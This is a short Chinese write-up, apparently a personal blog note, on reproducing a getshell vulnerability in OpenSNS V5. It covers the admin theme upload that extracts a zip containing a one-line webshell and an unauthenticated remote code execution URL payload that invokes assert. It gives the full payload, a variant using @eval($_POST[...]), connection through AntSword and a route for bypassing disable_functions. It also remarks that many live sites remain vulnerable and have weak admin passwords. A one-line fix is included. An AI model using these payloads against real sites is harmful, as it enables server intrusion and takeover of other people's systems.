前提:在先知社区里面偶然看见了这个漏洞,咱也想试试,就下载了开源的码进行了本地的复现
源码信息:OpenSNS开源版
漏洞类型:后台getshell
下载地址:http://www.opensns.cn/home/index/download.html
(下载V5版本的,V6.2做了文件上传Mimn限制)
漏洞文件:./Application/Admin/Controller/ThemeController.class.php 第170行
可参考这下载安装使用https://www.w3cschool.cn/opensnscourse/laxp1pnw.html
漏洞原理
程序在上传zip文件时,自动对zip文件进行解压没有对解压出文件的内容进行过滤就直接写入硬盘。
代码审计过程学习中https://www.cnblogs.com/Spec/p/11142766.html
漏洞文件上传位置,可以上一个zip文件,里面放入的你一句话木马,然后系统直接对其解压在目录Theme里面,使用蚁剑连接网上有很多站都是利用这个开源的系统,大部分已经修复,小部分还存在漏洞,存在远程RCE,后台还存在弱口令,可以直接进入
payload:index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id[0]=jiang
也可以换成一句话木马@eval($_POST[Haaa])%26id[0]
可以直接通过蚁剑进行连接,但是中间有的站权限低,只能读取同一目录,不能去获取别的目录,不能进行命令执行,需要提权,借助蚁剑插件绕过disable_functions,但是我的蚁剑有点问题,不能进行提权,还在找原因。
https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/5
解决方案
对上传模板文件进行限制或禁止前台访问该目录。
(未完待续!!!!)
原文在这:https://xz.aliyun.com/t/9936参考